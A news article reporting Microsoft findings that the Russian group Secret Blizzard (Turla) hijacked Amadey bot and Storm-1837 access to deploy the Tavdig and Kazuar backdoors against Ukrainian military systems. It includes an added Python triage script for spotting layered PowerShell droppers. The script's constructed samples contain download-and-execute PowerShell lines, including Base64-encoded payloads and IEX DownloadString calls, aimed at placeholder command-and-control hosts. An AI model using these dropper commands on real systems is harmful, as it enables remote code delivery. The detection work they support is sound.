Russian nation-state actors have been observed using malware linked to other threat groups to install the well-known Kazuar backdoor on military assets in Ukraine.
Newly disclosed findings from Microsoft’s Risk Intelligence team reveal that the attacker used the Amadey bot malware to deliver custom malware to “specifically targeted” systems associated with Ukraine’s military forces during March and April 2024.
This is the second time since 2022 that the notorious group Secret Blizzard, also known as Turla, has piggybacked on a cybercrime campaign to spread its malicious tools in Ukraine.
Microsoft said that by commandeering other threat actors’ access points, Secret Blizzard aims to broaden its operational reach.
The group employs a range of tactics, including adversary-in-the-middle attacks, watering hole attacks, and targeted phishing.
Secret Blizzard is assessed to focus on multiple sectors to sustain long-term covert intelligence collection, with a primary emphasis on ministries of foreign affairs, embassies, government agencies, defence departments, and defence-related companies worldwide.
Microsoft, in collaboration with Lumen Technologies’ Black Lotus Labs, also recently disclosed the hijacking of 33 command-and-control (C2) servers belonging to the Pakistani hacking group Storm-0156, which Turla allegedly repurposed for its own operations.
The attacks against Ukrainian organizations involve deploying the Tavdig backdoor, which in turn installs an updated variant of Kazuar, first detected by Palo Alto Networks’ Unit 42 in November 2023.
Cybercriminals linked to Amadey have been consistently exploiting vulnerabilities to run the XMRig cryptocurrency miner, activity that Microsoft tracks under the codename Storm-1919.
Secret Blizzard is believed to have either used the Amadey malware-as-a-service (MaaS) or covertly accessed the Amadey command-and-control (C2) panels to download a PowerShell dropper onto target devices. The dropper incorporates a Base64-encoded Amadey payload appended with an additional code segment that reaches out to a separate Turla C2 server.
Microsoft suggests that the need to encode the PowerShell dropper with a separate C2 URL controlled by Secret Blizzard indicates that the group was not directly in control of the C2 mechanism used by the Amadey bot.
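The detail that matters for defenders in the two paragraphs above is structural: a dropper that carries a Base64-encoded payload calling home to one host, plus an appended segment that contacts a second, separately controlled host. The following Python is an added example, not code from the report or from Microsoft, showing how a script-block triage routine could surface that layering. All scripts and hostnames in it are constructed for the example (the `.example.test` names are placeholders, not indicators from the page).

```python
"""Triage for layered PowerShell droppers (added example, constructed samples).

A script is flagged as "layered-c2" when it embeds a Base64 blob that decodes
to code referencing one host, while the script as a whole references at least
one more host. Ordinary single-download scripts are not flagged.
"""
import base64
import binascii
import re
from urllib.parse import urlparse

# A run of 40+ Base64 characters is long enough to exclude normal identifiers.
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
URL_RE = re.compile(r"https?://[A-Za-z0-9.\-]+(?::\d+)?(?:/[^\s\"'`)]*)?", re.IGNORECASE)


def _decode_blob(blob):
    """Decode one Base64 blob to text, or return None if it is not valid Base64.
    UTF-16LE is used when the bytes look like it (what -EncodedCommand produces)."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError):
        return None
    if len(raw) % 2 == 0 and raw[1::2].count(0) > len(raw) // 4:
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("utf-8", errors="replace")


def decode_layers(script, max_depth=3):
    """Return [script, decoded_blob_1, ...], following nested encodings up to max_depth."""
    layers = [script]
    frontier = [script]
    for _ in range(max_depth):
        decoded = []
        for chunk in frontier:
            for blob in B64_RE.findall(chunk):
                text = _decode_blob(blob)
                if text is not None:
                    decoded.append(text)
        if not decoded:
            break
        layers.extend(decoded)
        frontier = decoded
    return layers


def hosts_in(text):
    """Distinct lowercase hostnames referenced by URLs in text."""
    hosts = set()
    for url in URL_RE.findall(text):
        host = urlparse(url).hostname
        if host:
            hosts.add(host.lower())
    return hosts


def assess(script):
    """Classify one script block by how its outbound hosts are distributed across layers."""
    layers = decode_layers(script)
    clear_hosts = hosts_in(layers[0])
    encoded_hosts = set()
    for layer in layers[1:]:
        encoded_hosts |= hosts_in(layer)
    all_hosts = clear_hosts | encoded_hosts
    if not all_hosts:
        verdict = "none"
    elif len(all_hosts) == 1:
        verdict = "single-host"
    elif encoded_hosts:
        verdict = "layered-c2"  # at least one host hidden inside an encoded payload, another elsewhere
    else:
        verdict = "multi-host"
    return {"verdict": verdict, "hosts": sorted(all_hosts), "encoded_hosts": sorted(encoded_hosts)}


def build_samples():
    """Constructed script-block texts standing in for PowerShell event 4104 ScriptBlockText."""
    inner = 'Invoke-WebRequest -Uri "http://bot-panel.example.test/gate.php" -OutFile $env:TEMP\\a.exe'
    inner_b64 = base64.b64encode(inner.encode("utf-16-le")).decode("ascii")
    layered = (
        '$b=[Convert]::FromBase64String("' + inner_b64 + '");'
        '[Text.Encoding]::Unicode.GetString($b)|IEX;'
        'IEX (New-Object Net.WebClient).DownloadString("http://second-c2.example.test/stage2.ps1")'
    )
    benign = "Get-ChildItem C:\\Logs | Where-Object Length -gt 1MB"
    single = '$u="http://bot-panel.example.test/gate.php";Invoke-WebRequest -Uri $u -OutFile $env:TEMP\\a.exe'
    return {"layered": layered, "benign": benign, "single": single}


if __name__ == "__main__":
    for name, script in build_samples().items():
        print(name, assess(script))
```

The verdict is deliberately coarse: a second host in the clear next to an encoded first stage is a triage signal, not proof, and a real deployment would enrich both hostnames against reputation data before alerting.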
The attacker then downloads a custom reconnaissance tool to collect information about the compromised device, in particular checking whether Microsoft Defender is enabled, so that they can concentrate on systems of greater interest.
In the stage that follows, the attacker deploys a PowerShell script that downloads and runs a payload comprising the Tavdig backdoor and a legitimate Symantec binary, which is abused for DLL side-loading. Tavdig performs further reconnaissance and deploys Kazuar v2 as needed.
Microsoft also found that the threat actor repurposed a PowerShell backdoor linked to a Russian hacking group tracked as Storm-1837 and UAC-0149 to distribute a PowerShell dropper containing Tavdig.
How Secret Blizzard gained control of the Storm-1837 backdoor and the Amadey botnet to deploy its own custom tools remains under investigation, according to Microsoft.
The latest findings underscore the adversary’s persistent pursuit of covert access points, whether obtained legitimately or acquired illicitly, to conduct clandestine operations while concealing its involvement.
According to Sherrod DeGrippo, Director of Risk Intelligence Technique at Microsoft, it’s common for actors to adopt similar tactics or tools; however, we rarely witness them compromising and leveraging the infrastructure of other actors.
“The primary objectives of most nation-state sponsored threat actors rely heavily on the control and manipulation of dedicated or thoroughly compromised systems, ensuring the secrecy and continuity of their operations.” Such a deliberate approach likely aims to stymie threat analysts and hinder attribution of the responsible actors, complicating the investigation.